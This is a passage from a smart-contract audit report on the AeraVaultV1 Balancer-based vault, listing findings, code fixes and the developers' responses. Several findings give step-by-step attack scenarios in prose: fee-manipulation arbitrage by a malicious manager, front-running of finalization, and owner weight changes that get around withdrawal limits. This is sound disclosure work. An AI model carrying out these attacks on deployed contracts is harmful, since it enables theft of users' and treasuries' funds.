• Check with Balancer team about best approach to add and remove funds
• Manager can cause an immediate weight change
• Important fields of Balancer can be overwritten by EndTime
Only deploy once ManagedPool is stable and considered production ready.
Gauntlet: Fix implemented in PR #11. We should still update to the latest version at this stage (and continue to do so).
Spearbit: Acknowledged.

+5.2.5 Malicious manager could cause Vault funds to be inaccessible
Severity: High Risk
Context: AeraVaultV1.sol#L794-L822
Description: The calculateAndDistributeManagerFees() function pushes tokens to the manager; if for some reason this action fails, the entire Vault is blocked and funds become inaccessible. This occurs because the following functions depend on the execution of calculateAndDistributeManagerFees(): deposit(), withdraw(), setManager(), claimManagerFees(), initiateFinalization(), and therefore finalize() as well. Within calculateAndDistributeManagerFees() the call to safeTransfer() is the riskiest and could fail in the following situations:
• A token with a callback is used, for example an ERC777 token, and the callback is not implemented correctly.
• A token with a blacklist option is used and the manager is blacklisted. For example, USDC has such blacklist functionality. Because the manager can be an unknown party, a small risk exists that they are malicious and their address could be blacklisted in USDC.
Note: set as high risk because, although the probability is very small, the impact is that Vault funds become inaccessible.

    function calculateAndDistributeManagerFees() internal {
        ...
        for (uint256 i = 0; i < amounts.length; i++) {
            tokens[i].safeTransfer(manager, amounts[i]);
        }
    }

Recommendation: Beware of including tokens with callbacks, such as ERC777 tokens, in the Vault. Additionally, use a pull-over-push pattern to let the manager retrieve fees; this way the Vault can never get blocked. This recommendation can be implemented as follows (see the sketch after this list):
• Rename calculateAndDistributeManagerFees() to calculateManagerFees().
• In calculateManagerFees(), add up all management fees in a mapping (separate per manager address, e.g. to prevent having to push the fees in setManager()) and keep track of the total of the fees (managersFeeTotal) to make sure unclaimed fees are not withdrawn.
• In withdraw() and returnFunds(), make sure unclaimed fees cannot be withdrawn.
• Let the manager retrieve fees via claimManagerFees(), using msg.sender as the index into the mapping with the fees. This function should retrieve the Balancer funds, e.g. reuse the code of the second half of calculateAndDistributeManagerFees(). It should also lower managersFeeTotal and the fee for msg.sender.
This also alleviates rounding issues with fees and reduces the gas used by deposit(), which could be relevant when pools are deployed with a large number of tokens. An alternative could be to use try/catch around the call to safeTransfer(), but then the fees aren't distributed properly.
Gauntlet: We will be incorporating the suggestions.
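A minimal sketch of the accrue-and-claim (pull) flow described above; the names and structure are hypothetical and heavily reduced from the audited contract:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
    import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

    // Hypothetical, stripped-down accrual ledger showing the pull pattern.
    contract ManagerFeeLedgerSketch {
        using SafeERC20 for IERC20;

        IERC20[] public tokens;
        address public manager;
        // Fee accrued per manager per token, plus a running total so that
        // withdraw()/returnFunds() can exclude unclaimed fees.
        mapping(address => mapping(IERC20 => uint256)) public managerFees;
        mapping(IERC20 => uint256) public managersFeeTotal;

        constructor(IERC20[] memory tokens_, address manager_) {
            tokens = tokens_;
            manager = manager_;
        }

        // Accrue instead of pushing: a blacklisted or reverting manager
        // address can no longer block deposit()/withdraw()/setManager().
        function _accrueManagerFees(uint256[] memory amounts) internal {
            for (uint256 i = 0; i < tokens.length; i++) {
                managerFees[manager][tokens[i]] += amounts[i];
                managersFeeTotal[tokens[i]] += amounts[i];
            }
        }

        // Pull: only the claiming manager is affected if the transfer fails.
        function claimManagerFees() external {
            for (uint256 i = 0; i < tokens.length; i++) {
                IERC20 token = tokens[i];
                uint256 fee = managerFees[msg.sender][token];
                if (fee == 0) continue;
                managerFees[msg.sender][token] = 0;
                managersFeeTotal[token] -= fee;
                token.safeTransfer(msg.sender, fee);
            }
        }
    }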
+5.2.6 updateWeightsGradually allows change rates to start in the past with a very high maximumRatio
Severity: High Risk
Context: AeraVaultV1.sol#L599-L639
Description: The current updateWeightsGradually uses startTime where it should use Math.max(block.timestamp, startTime). Because Balancer will internally use startTime = Math.max(currentTime, startTime); as the minimal start time, this allows a caller to:
• Have a startTime in the past.
• Have a targetWeights[i] higher than allowed.
We also suggest adding another check to prevent startTime > endTime. Although Balancer replicates the same check, it is still needed in the Aera implementation to prevent transactions from reverting with an underflow error on uint256 duration = endTime - startTime;.
Recommendation: Update the code to correctly initialize the startTime value and add a check to prevent having endTime in the past (startTime > endTime). A possible solution looks as follows:

    function updateWeightsGradually( ... ) ... {
    +   startTime = Math.max(block.timestamp, startTime);
    +   if (startTime > endTime) {
    +       revert Aera__WeightChangeEndBeforeStart();
    +   }
        if (
    -       Math.max(block.timestamp, startTime)
    +       startTime
                + MINIMUM_WEIGHT_CHANGE_DURATION > endTime
        ) {
            revert Aera__WeightChangeDurationIsBelowMin(
                endTime - startTime, // no longer reverts
                MINIMUM_WEIGHT_CHANGE_DURATION
            );
        }
        ...
    }

Gauntlet: Recommendation implemented in PR #146.
Spearbit: Acknowledged.

+5.2.7 The vault manager has unchecked power to create arbitrage using setSwapFees
Severity: High Risk
Context: AeraVaultV1.sol#L663-L679, BasePool.sol#L58-L59
Description: A previously known issue was that a malicious vault manager could arbitrage the vault, as in the scenario below:
1. Set the swap fees to a high value via setSwapFee (10% is the maximum).
2. Wait for the market price to move against the spot price.
3. In the same transaction, reduce the swap fees to ~0 (0.0001% is the minimum) and arbitrage the vault.
The proposed fix was to limit the percentage change of the swap fee to a maximum of MAXIMUM_SWAP_FEE_PERCENT_CHANGE each time. However, because there is no restriction on how many times the setSwapFee function can be called in a block or transaction, a malicious manager can still call it multiple times in the same transaction and eventually set the swap fee to the value they want.
Recommendation: Enforce a cooldown period of reasonable length between two consecutive setSwapFee function calls.
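A sketch of such a cooldown; the reduced contract, constant, variable and error names are hypothetical, and the cooldown length is an assumed placeholder:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical, reduced contract showing only the rate-limited setter.
    contract SwapFeeCooldownSketch {
        error Aera__SwapFeeCooldownActive();

        uint256 private constant SWAP_FEE_COOLDOWN = 1 hours; // assumed length
        uint256 private lastSwapFeeChange;

        function setSwapFee(uint256 /* newSwapFee */) external /* onlyManager */ {
            // At most one fee change per cooldown window, so the bounded
            // per-call change cannot be chained within a single transaction.
            if (block.timestamp < lastSwapFeeChange + SWAP_FEE_COOLDOWN) {
                revert Aera__SwapFeeCooldownActive();
            }
            lastSwapFeeChange = block.timestamp;
            // the existing MAXIMUM_SWAP_FEE_PERCENT_CHANGE check and the
            // pool call would follow here
        }
    }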
+5.2.8 Implement a function to claim liquidity mining rewards
Severity: High Risk
Context: AeraVaultV1.sol
Description: Balancer offers liquidity mining rewards for liquidity providers. From the Balancer documentation:

    Liquidity Mining distributions are available to claim weekly through the MerkleOrchard contract. Liquidity Providers can claim tokens from this contract by submitting claims to the tokens. These claims are checked against a Merkle root of the accrued token balances which are stored in a Merkle tree. Claiming through the MerkleOrchard is much more gas-efficient than the previous generation of claiming contracts, especially when claiming multiple weeks of rewards, and when claiming multiple tokens.

The AeraVault is itself the only liquidity provider of the deployed Balancer pool, so each week it is entitled to claim those rewards. Currently those rewards cannot be claimed, because the AeraVault is missing an implementation to interact with the MerkleOrchard contract, causing all rewards (BAL + other tokens) to remain in the MerkleOrchard forever.
Recommendation: Add a function to allow the vault owner (the Treasury) to claim those rewards. More information on how to claim rewards and interact with the contract can be found directly on the Balancer documentation website. Rewards claimed by the AeraVault can later be distributed to the Treasury via the sweep function.
Gauntlet: Recommendation implemented in PR #146.
Spearbit: Acknowledged.

5.3 Medium Risk

+5.3.1 Owner can circumvent allowance() via enableTradingWithWeights()
Severity: Medium Risk
Context: AeraVaultV1.sol#L564-L593
Description: The vault Owner can set arbitrary weights via disableTrading() followed by enableTradingWithWeights() to set the spot price and create arbitrage opportunities for himself. This way the allowance() checks in withdraw(), which limit the amount of funds an Owner can withdraw, can be circumvented. Something similar can be done with enableTradingRiskingArbitrage() in combination with sufficient time.
Also see the following issues:
• allowance() doesn't limit withdraw()s
• enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled
• Separation of concerns Owner and Manager

    function disableTrading() ... onlyOwnerOrManager ... {
        setSwapEnabled(false);
    }

    function enableTradingWithWeights(uint256[] calldata weights) ... onlyOwner ... {
        ...
        pool.updateWeightsGradually(timestamp, timestamp, weights);
        setSwapEnabled(true);
    }

    function enableTradingRiskingArbitrage() ... onlyOwner ... {
        setSwapEnabled(true);
    }

Recommendation: Consider allowing only the manager to execute the disableTrading() function, although this also has disadvantages. Additionally, use an oracle to determine the spot price (as is already envisioned for the next versions of the protocol).
Gauntlet: For safety reasons we want the treasury to have full control over trading. Given our current trust model, this won't be an issue for V1, so no action will be taken at this time.
Spearbit: Acknowledged.

+5.3.2 Front-running attacks on finalize could affect received token amounts
Severity: Medium Risk
Context: AeraVaultV1.sol#L539, AeraVaultV1.sol#L899-L910
Description: The returnFunds() function (called by finalize()) withdraws the entire holdings in the Balancer pool but does not allow the caller to specify and enforce a minimum amount of received tokens. Without such a check the finalize() function could be susceptible to a front-running attack. A potential exploit scenario looks as follows:
1. The notice period has passed and the Treasury calls finalize() on the Aera vault. Assume the Balancer pool contains 1 WETH and 3000 DAI, and that the WETH and DAI weights are both 0.5.
2. An attacker front-runs the Treasury's transaction and swaps in 3000 DAI to get 0.5 WETH from the pool.
3. As an unexpected result, the Treasury receives 0.5 WETH and 6000 DAI.
Therefore an attacker can force the Treasury to accept the trade that they offer. Although the Treasury can execute a reverse trade on another market to recover the token amount and distribution, not every Treasury can execute such a trade (e.g., if a timelock controls it). Notice that the attacker may not profit from the swap because of slippage, but they could be incentivized to perform such an attack if it causes considerable damage to the Treasury.
Recommendation: Possible mitigations include (the first option is sketched after this list):
• Allowing the caller to specify the minimum amount of each token and reverting the transaction if not enough tokens are available.
• Adopting a two-step finalization pattern. First, disable trading and check whether the token amounts in the Balancer pool are as desired. If not, enable trading again and let arbitrageurs re-balance the pool. Once rebalanced, finalize the vault.
• Using Flashbots to reduce front-running probabilities.
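A sketch of the first mitigation; the signature change and error name are hypothetical, and returnFunds() is assumed to behave as in the audited vault:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical skeleton: finalize() extended with caller-supplied minimums.
    abstract contract FinalizeWithMinAmountsSketch {
        error Aera__FinalizeAmountBelowMin();

        // Assumed to exist in the vault: withdraws everything from the pool.
        function returnFunds() internal virtual returns (uint256[] memory);

        function finalize(uint256[] calldata minAmounts) external virtual {
            uint256[] memory amounts = returnFunds();
            for (uint256 i = 0; i < amounts.length; i++) {
                // Revert if a front-runner skewed the pool's token distribution.
                if (amounts[i] < minAmounts[i]) revert Aera__FinalizeAmountBelowMin();
            }
            // distribution of the amounts to the Treasury continues as before
        }
    }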
Gauntlet: Based on our latest thinking, trading should be paused when initiateFinalization is run. That should resolve this issue.
Spearbit: setSwapEnabled(false) has been added in initiateFinalization() in PR #137. It is worth noting that pausing trading does not completely solve the issue. If initiateFinalization() happens to be front-run (although not profitable for a front-runner, it could still happen), then the token distributions could still be off. This situation should probably be detected (manually?) and corrected with enableTradingWithWeights() and disableTrading().
Gauntlet: I think there are 2 things that are important:
• If the treasury is using withdraw and asking for a specific amount of tokens, that they don't get less than that. If there happens to be a front-running transaction, just like in an AMM they may not be able to withdraw what they want.
• If the treasury is finalizing, they should expect to retain a decent amount of the value of the pool, but since it's a liquidity share in an AMM, there aren't guarantees about the specific ratios of token amounts. The only guarantee is the relationship between token weights, balances and spot prices.
Spearbit: The value indeed stays the same. Only if the token distribution were important would you want to solve this. Assuming the token distribution doesn't matter, you might as well keep the code as is (unless there are other reasons to change): e.g. a front-run of initiateFinalization() plus the trade pause has the same effect as a front-run of finalize() while trading hasn't been paused.
Gauntlet: I still like the proposal as we see other benefits in pausing trading. Since trading is primarily a means of rebalancing execution, we can shut it off post initiation of finalization to mitigate impermanent loss for the treasury.
Spearbit: Acknowledged. Beware that enableTradingWithWeights(), enableTradingRiskingArbitrage() and disableTrading() still work after initiateFinalization(). This could be put to good use but may also be unwanted (in that case additional checks are required in these functions).

+5.3.3 safeApprove in depositToken could revert for a non-standard token like USDT
Severity: Medium Risk
Context: AeraVaultV1.sol#L893
Description: Some non-standard tokens like USDT will revert when a contract or a user tries to approve an allowance if the spender's allowance has already been set to a non-zero value. In the current code we have not seen any real problem with this, because the amount retrieved via depositToken() is approved and sent to the Balancer pool via joinPool() and managePoolBalance(); Balancer transfers the same amount, lowering the approval to 0 again. However, if the approval is not lowered to exactly 0 (due to a rounding error or another unforeseen situation), then the next approval in depositToken() will fail (assuming a token like USDT is used), blocking all further deposits.
Note: Set to medium risk because the probability of this happening is low, but the impact would be high. We should also note that OpenZeppelin has officially deprecated the safeApprove function, suggesting the use of safeIncreaseAllowance and safeDecreaseAllowance instead.
Recommendation: Adopt a safer approach to cover edge cases such as the aforementioned USDT token, for instance the following solution:

    function depositToken(IERC20 token, uint256 amount) internal {
        token.safeTransferFrom(owner(), address(this), amount);
    -   token.safeApprove(address(bVault), amount);
    +   uint256 allowance = token.allowance(address(this), address(bVault));
    +   if (allowance > 0) {
    +       token.safeDecreaseAllowance(address(bVault), allowance);
    +   }
    +   token.safeIncreaseAllowance(address(bVault), amount);
    }

Please note that the amount used as a parameter for safeIncreaseAllowance should follow the recommendations written in the issue "Fee on transfer can block several functions".

+5.3.4 Consult with Balancer team about best approach to add and remove funds
Severity: Medium Risk
Context: AeraVaultV1.sol
Description: The Aera Vault uses the AssetManager functionality of managePoolBalance() to add and remove funds. The standard way to add and remove funds in Balancer is via joinPool() / exitPool(). Using the managePoolBalance() function might lead to unexpected behavior in the future. Additionally, this disables the capacity to implement the original intention of the AssetManager functionality, e.g. storing funds elsewhere to generate yield.
Recommendation: Double-check with the Balancer team which is the best approach to implement. If either way is non-optimal, ask them to implement the functionality to support this. In case the joinPool() / exitPool() path is recommended by the Balancer team, it can probably be implemented in the following way:
• Limit access to joinPool() via an allowlist (as is already done).
• Limit access to exitPool() via a custom pool with an onExit() callback function (which could also integrate allowance()).
• Adjust the spot price after joinPool() / exitPool() via updateWeights().
• Perhaps use the AUM (managementAumFeePercentage) fees.
• Only keep the BPT (pool tokens) in the vault.
Gauntlet: Both ways are probably not the "intended" use case; the current version seems a bit more elegant code-wise. We will get in touch with the Balancer team about the best way to use these low-level functions.
Spearbit: Acknowledged.

+5.3.5 Fee on transfer can block several functions
Severity: Medium Risk
Context: AeraVaultV1.sol#L456-L514
Description: Some tokens have a fee on transfer, for example USDT. Usually this fee is not enabled, but it could be re-enabled at any time. With this fee enabled, the withdrawFromPool() function would receive slightly fewer tokens than the amounts requested from Balancer, causing the next safeTransfer() call to fail because there are not enough tokens in the contract. This means withdraw() calls will fail. The functions deposit() and calculateAndDistributeManagerFees() can also fail because they have similar code.
Note: The function returnFunds() is more robust and can handle this problem.
Note: The problem can be alleviated by sending additional tokens directly to the Aera Vault contract to compensate for fees, lowering the severity of the problem to medium.

    function withdraw(uint256[] calldata amounts) ... {
        ...
        withdrawFromPool(amounts); // could get slightly less than amount with a fee on transfer
        ...
        for (uint256 i = 0; i < amounts.length; i++) {
            if (amounts[i] > 0) {
                tokens[i].safeTransfer(owner(), amounts[i]); // could revert if the full amounts[i] isn't available
                ...
            }
            ...
        }
    }

Recommendation: Check the balanceOf() the tokens before and after a safeTransfer() or safeTransferFrom(). Use the difference as the amount of tokens sent/received.
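A minimal sketch of that measurement; the helper and contract names are hypothetical:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
    import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

    // Hypothetical helper: measure what actually arrived, not what was sent.
    abstract contract FeeOnTransferSafePull {
        using SafeERC20 for IERC20;

        function _pullToken(IERC20 token, address from, uint256 amount)
            internal
            returns (uint256 received)
        {
            uint256 balanceBefore = token.balanceOf(address(this));
            token.safeTransferFrom(from, address(this), amount);
            // With a fee on transfer, `received` can be less than `amount`;
            // downstream accounting should use `received`.
            received = token.balanceOf(address(this)) - balanceBefore;
        }
    }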
+5.3.6 enableTradingWithWeights allows the Treasury to change the pool's weights even if the swap is not disabled
Severity: Medium Risk
Context: AeraVaultV1.sol#L574-L583
Description: enableTradingWithWeights is a function that can only be called by the owner of the Aera Vault contract and that should be used only to re-enable the swap feature on the pool while updating token weights. The function does not verify whether the pool's swap feature is already enabled; as a result, it allows the Treasury to act as the manager, who is the only actor allowed to change the pool weights. The function should add a check to ensure that it is only callable when the pool's swap feature is disabled.
Recommendation: Update the function to revert when the pool's swap feature is enabled.

    function enableTradingWithWeights(uint256[] calldata weights)
        external
        override
        onlyOwner
        whenInitialized
    {
    +   bool isSwapEnabled = pool.getSwapEnabled();
    +   if (isSwapEnabled) {
    +       revert Aera__PoolSwapIsAlreadyEnabled();
    +   }
        uint256 timestamp = block.timestamp;
        pool.updateWeightsGradually(timestamp, timestamp, weights);
        setSwapEnabled(true);
    }

Gauntlet: Fixed in PR #126.
Spearbit: Acknowledged.

+5.3.7 AeraVault constructor is not checking all the input parameters
Severity: Medium Risk
Context: AeraVaultV1.sol#L260-L345
Description: The Aera Vault constructor has the role of handling Balancer's ManagedPool deployment. The constructor should increase the amount of user input validation, and the Gauntlet team should be aware of the possible edge cases that could occur given that the deployment of the Aera Vault is handled directly by the Treasury and not by the Gauntlet team itself. We list all the worst-case scenarios that could happen given the premise that deployments are handled by the Treasury:
1. factory could be a wrapper contract that deploys a ManagedPool. This means the deployer could pass correct parameters to the Aera Vault to pass its checks, but use custom and malicious parameters on the factory wrapper to deploy the real Balancer pool.
2. swapFeePercentage is not checked. On Balancer, the deployment will revert if the value is not within the range >= 1e12 (0.0001%) and <= 1e17 (10%; this fits in 64 bits). Without a check of its own, Gauntlet simply accepts Balancer's swap-fee requirements.
3. manager_ is not checked. The Treasury could set the manager to itself (the owner of the vault), which would give the Treasury full power to manage the Vault. At least the values address(0), address(this) and owner() should be checked. The same checks should also be done in the setManager() function.
4. validator_ could be set to a custom contract that gives full allowances to the Treasury. This would make withdraw() act like finalize(), allowing all the funds to be withdrawn from the vault/pool.
5. noticePeriod_ has only a max value check. The Gauntlet team explained that a time delay between the initialization of the finalize process and the actual finalize is needed to prevent the Treasury from being able to instantly withdraw all the funds. Not having a min value check allows the Treasury to set the value to 0, so there would be no delay between initiateFinalization() and finalize(), because noticeTimeoutAt == block.timestamp.
6. managementFee_ has no minimum value check. This would allow the Treasury to not pay the manager, because the managerFeeIndex would always be 0.
7. description_ can be empty.
From the Specification PDF, the description of the vault has the role to "Describe vault purpose and modelling assumptions for differentiating between vaults". Being empty could lead to a bad UX for external services that need to differentiate between vaults.
These are all the checks that are done directly by Balancer during deployment via the Pool Factory:
• BasePool constructor#L94-L95: min and max number of tokens.
• BasePool constructor#L102: the token array is sorted following the Balancer specification (sorted by token address).
• BasePool constructor calling _setSwapFeePercentage: min and max value for swapFeePercentage.
• BasePool constructor calling vault.registerTokens: token address uniqueness (the same token can't be in the pool twice). Following the path that the vault.registerTokens call takes through MinimalSwapInfoPoolsBalance, the function _registerMinimalSwapInfoPoolTokens also checks that token != IERC20(0).
• ManagedPool constructor calling _startGradualWeightChange: checks the min value of each weight and that the total sum of the weights equals 100%. _startGradualWeightChange internally checks that endWeight >= WeightedMath._MIN_WEIGHT and normalizedSum == FixedPoint.ONE.
Recommendation:
• Create a factory to wrap both the AeraVault and Validator deployment, to reduce the influence of, and possible malicious attacks from, external actors.
• Add a custom min/max value check for swapFeePercentage on top of Balancer's check if needed.
• Add checks on the manager_ value to prevent an empty manager (address(0)) or a manager equal to the AeraVault owner (the Treasury itself). (A sketch of these checks follows the token list below.)
• Add a min value check to the noticePeriod_ parameter if needed, to prevent the time between the initiateFinalization and finalize calls from being too small.
• Add a min value check to the managementFee_ parameter if needed, to prevent the Treasury from not paying the manager.
• Add a check on description_ to prevent deploying an AeraVault with an empty description, which would create confusion in web applications that display similar vaults.
• Check meticulously that future Balancer versions still maintain the same checks listed above. Consider replicating those checks during deployment to be future-proof.
We also recommend carefully documenting the possible consequences of supporting "special" types of tokens:
• Tokens with more than 18 decimals, which are not supported by Balancer.
• Tokens with a small number of decimals.
• ERC777 tokens.
• Tokens with fees on transfer.
• Tokens with blacklisting capabilities.
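A sketch of the manager, notice-period and description checks; the error names, the minimum constant and the reduced parameter list are hypothetical:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical, reduced constructor showing only the suggested validation.
    contract ConstructorChecksSketch {
        error Aera__InvalidManager();
        error Aera__NoticePeriodTooShort();
        error Aera__DescriptionEmpty();

        uint256 private constant MINIMUM_NOTICE_PERIOD = 1 days; // assumed value

        address public manager;
        uint256 public noticePeriod;
        string public description;

        constructor(address manager_, uint256 noticePeriod_, string memory description_) {
            if (
                manager_ == address(0) ||
                manager_ == address(this) ||
                manager_ == msg.sender // the deployer becomes the owner/Treasury
            ) revert Aera__InvalidManager();
            if (noticePeriod_ < MINIMUM_NOTICE_PERIOD) revert Aera__NoticePeriodTooShort();
            if (bytes(description_).length == 0) revert Aera__DescriptionEmpty();
            manager = manager_;
            noticePeriod = noticePeriod_;
            description = description_;
        }
    }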
Gauntlet: In our trust model we only decide to manage the vault if it has been correctly deployed. So, leaving the focus on human error, I think the following are actionable:
3. (manager checks) Add checks on the manager_ value to prevent an empty manager (address(0)) or that the manager and Aera Vault owner will be equal to the Treasury itself.
4. (description checks) Add a check on description_ to prevent deploying an Aera Vault with an empty description that would create confusion in web applications that display similar vaults.
I'll also take a documentation action for these:
• Tokens with more than 18 decimals, which are not supported by Balancer
• Tokens with a small number of decimals
• ERC777 tokens
• Tokens with fees on transfer
• Tokens with blacklisting capabilities

+5.3.8 Possible mismatch between Validator.count and AeraVault assets count
Severity: Medium Risk
Context: PermissiveWithdrawalValidator.sol#L13, AeraVaultV1.sol#L456-L514
Description: A weak connection between the WithdrawalValidator and the Aera Vault could lead to the inability to withdraw from a Vault. Consider the following scenario: the Validator is deployed with a tokenCount smaller than Vault.getTokens().length. Inside the withdraw() function we reference the following code block:

    uint256[] memory allowances = validator.allowance();
    uint256[] memory weights = getNormalizedWeights();
    uint256[] memory newWeights = new uint256[](tokens.length);

    for (uint256 i = 0; i < tokens.length; i++) {
        if (amounts[i] > holdings[i] || amounts[i] > allowances[i]) {
            revert Aera__AmountExceedAvailable(
                address(tokens[i]),
                amounts[i],
                holdings[i].min(allowances[i])
            );
        }
    }

A scenario where allowances.length < tokens.length would cause this function to revert with an "Index out of bounds" error. The only way for the Treasury to withdraw funds would then be via the finalize() method, which has a time delay.
Recommendation: Ensure that when the Aera Vault and Validator are deployed, Validator.count is the same as the number of assets managed by the vault. A potential solution is to create a Factory contract that deploys both the Aera Vault and the Validator. In that case, remember to correctly set up the Aera Vault Ownable contract: the deployer is also the Vault's owner, so with a Factory the owner of the vault would be the Factory itself, which would cause all onlyOwner calls to revert. Additionally, see the following issue: "Ensure integrity of deployment of vault".
Gauntlet: I think we are OK with trusting the treasury to deploy the validator. The main reason is that we don't see a simple way to parametrize validators at the moment, and each treasury partner will be highly trusted early on, so we'd be starting with permissive validators and then leaning on treasuries to suggest some custom validators first. A check on allowances.length was added in PR #141.
Spearbit: Acknowledged.
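For reference, a defensive length check in the spirit of the fix referenced above could look like the following fragment inside withdraw(); the error name is hypothetical:

    uint256[] memory allowances = validator.allowance();
    // Guard against a misconfigured validator before indexing allowances[i].
    if (allowances.length != tokens.length) {
        revert Aera__AllowanceLengthMismatch(); // hypothetical error
    }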
5.4 Low Risk

+5.4.1 Ensure vault's deployment integrity
Severity: Low Risk
Context: AeraVaultV1.sol
Description: The Treasury could deploy, on purpose or by accident, a slightly different version of the contract and introduce bugs or backdoors. This might not be recognized by parties taking on Manager responsibilities (usually Gauntlet will be involved here).
Recommendation: Consider using a factory to deploy the contract(s), so that only parameters can be set.
Gauntlet: We are OK with trusting the treasury to deploy the validator. The main reason is that we don't see a simple way to parametrize validators at the moment, and each treasury partner will be highly trusted early on, so we'd be starting with permissive validators and then leaning on treasuries to suggest some custom validators first.
Spearbit: Acknowledged.

+5.4.2 Frequent calling of calculateAndDistributeManagerFees() lowers fees
Severity: Low Risk
Context: AeraVaultV1.sol#L682-L690, IManagerAPI.sol#L24-L25
Description: Via calculateAndDistributeManagerFees() a percentage of the Pool is subtracted and sent to the Manager. If this function is called too frequently, the Manager's fees will be lower. For example (generalized after this list):
• If he claims twice, each time getting 1%, he actually gets: 1% + 1% * (100% - 1%) = 1.99%.
• If he waits longer until he has earned 2%, he actually gets: 2%, which is slightly more than 1.99%.
• If called very frequently the fees go to 0 (especially taking into account the rounding down); however, the gas cost would be very high.
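The effect generalizes: claiming \(n\) times at a per-claim fraction \(p\) removes

\[ 1 - (1 - p)^n \]

of the pool, which for \(n \ge 2\) is strictly less than the single-claim fraction \(np\); e.g. for \(p = 1\%\) and \(n = 2\): \(1 - 0.99^2 = 1.99\% < 2\%\).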
The Manager can (accidentally) trigger this by calling claimManagerFees(). The Owner can, accidentally or on purpose (e.g. using a 0 balance change), trigger it by calling deposit(), withdraw() or setManager().
Note: Rounding errors make this slightly worse. Also see the following issue: "Possible rounding down of fees".

    function claimManagerFees() ... {
        calculateAndDistributeManagerFees(); // takes a percentage of the Pool
    }

Recommendation: Encourage managers not to claim fees too often, for example via NatSpec comments on the claimManagerFees() function inside the IManagerAPI.sol contract documenting that the function should not be called frequently. Because the Owner is ultimately responsible for the Vault, and the gas costs most likely outweigh the fees, it is probably not worth taking further action.
Gauntlet: Added a comment on claimManagerFees() in PR #138.
Spearbit: Acknowledged.

+5.4.3 OpenZeppelin best practices
Severity: Low Risk
Context: AeraVaultV1.sol#L4-L11
Description: The Aera Vault uses OpenZeppelin release 4.3.2, which is copied into its github repository. The current release of OpenZeppelin is 4.6.0 and includes several updates and security fixes. The copies of the OpenZeppelin files are also (manually) changed to adapt the import paths, which carries the risk of a mistake in the process.

    import "./dependencies/openzeppelin/SafeERC20.sol";
    import "./dependencies/openzeppelin/IERC20.sol";
    import "./dependencies/openzeppelin/IERC165.sol";
    import "./dependencies/openzeppelin/Ownable.sol";
    import "./dependencies/openzeppelin/ReentrancyGuard.sol";
    import "./dependencies/openzeppelin/Math.sol";
    import "./dependencies/openzeppelin/SafeCast.sol";
    import "./dependencies/openzeppelin/ERC165Checker.sol";

Recommendation: Use recent versions and consider OpenZeppelin best practices:
• Quite a lot of projects seem to use an NPM install, which leaves the risk of a supply chain attack on NPM. Another way would be to retrieve the contracts from the OpenZeppelin releases repository, but this also leaves the risk of a github supply chain attack.
• Preferably don't change the contracts, to prevent mistakes.
• OpenZeppelin has a way to alert projects of vulnerabilities before public disclosure.
• Monitor the updates to the releases.
• Update to a new release if relevant bugfixes are applied. With every large release, make sure a recent version of the OpenZeppelin contracts is used (but preferably also one that is somewhat battle-tested).

+5.4.4 Possible rounding down of fees
Severity: Low Risk
Context: AeraVaultV1.sol#L794-L822
Description: If a token has few decimals, then fees could be rounded down to 0, especially if the time between calls to calculateAndDistributeManagerFees() is relatively small. This could also slightly shift the spot price, because the balance of one coin is lowered while the other remains the same. With fewer decimals the situation worsens; e.g. Gemini USD (GUSD) has 2 decimals, so the problem already occurs with a balance of 10_000 GUSD.
Note: The rounding down is probably negligible in most cases.

    function calculateAndDistributeManagerFees() internal {
        ...
        for (uint256 i = 0; i < tokens.length; i++) {
            amounts[i] = (holdings[i] * managerFeeIndex) / ONE; // could be rounded down to 0
        }
        ...
    }

With 1 USDC in the vault and 2 hours between calls to calculateAndDistributeManagerFees(), the fee for USDC is rounded down to 0. This behavior is demonstrated in the following POC:

    import "hardhat/console.sol";

    contract testcontract {
        uint256 constant ONE = 10**18;
        uint256 managementFee = 10**8; // MAX_MANAGEMENT_FEE = 10**9

        constructor() {
            uint256 holdings = 1E6; // 1 USDC
            uint256 delay = 2 hours;
            uint256 managerFeeIndex = delay * managementFee;
            uint256 amounts = (holdings * managerFeeIndex) / ONE;
            console.log("Fee", amounts); // fee is 0
        }
    }

Recommendation: Consider implementing one (or more) of the following suggestions:
1. Sum all the fees and only claim and transfer them on the initiative of the manager. This also solves other issues, such as "Malicious manager could cause Vault funds to be inaccessible".
2. Accept the rounding issue and document it. Do verify that the impact on the Pool price and the management fees is indeed negligible. Managers could also be reimbursed manually if necessary.
3. If the potential change in the Pool price cannot be ignored: update the weights like withdraw() does.
4. Round the manager fees up, perhaps only when they are 0. Be aware, however, that repeatedly calling claimManagerFees() could then accrue additional fees, although these would probably be less than the gas costs.
5. Don't list tokens with a low number of decimals.
Gauntlet: We like 1 and 5. We think with 1 we would need to adjust the sweep function to disallow claiming vault tokens.
Spearbit: We would suggest only claiming the tokens from the vault when the manager claims them (i.e. have as few claims as possible, as this prevents rounding issues). That way you don't have to change sweep.
Gauntlet: Makes sense. FYI: if you claim too early, then you lose a little bit of value.

+5.4.5 Missing nonReentrant modifier on initiateFinalization(), setManager() and claimManagerFees() functions
Severity: Low Risk
Context: AeraVaultV1.sol#L517, AeraVaultV1.sol#L545, AeraVaultV1.sol#L682
Description: The initiateFinalization() function is missing a nonReentrant modifier while calculateAndDistributeManagerFees() executes external calls. The same goes for the setManager() and claimManagerFees() functions.
Recommendation: Consider adding the nonReentrant modifier to functions that perform external calls.
Gauntlet: Solved in PR #112.
Spearbit: Acknowledged.

+5.4.6 Potential division by 0
Severity: Low Risk
Context: AeraVaultV1.sol#L402-L514, AeraVaultV1.sol#L728-L749
Description: If the balance (e.g. holdings[]) of a token is 0 in deposit(), then dividing by holdings[] causes a revert.
Note: The withdraw() function has similar code, but when holdings[] == 0 it is not possible to withdraw() anyway.
Note: The current Mannon vault code will not allow the balances to be 0.
Note: Although not used in the current code, Balancer requires the balance to be 0 in order to do a deregisterTokens(). Additionally, refer to the Balancer documentation about the-vault#deregistertokens.
The worst case scenario is deposit() not working.
    function deposit(uint256[] calldata amounts) ... {
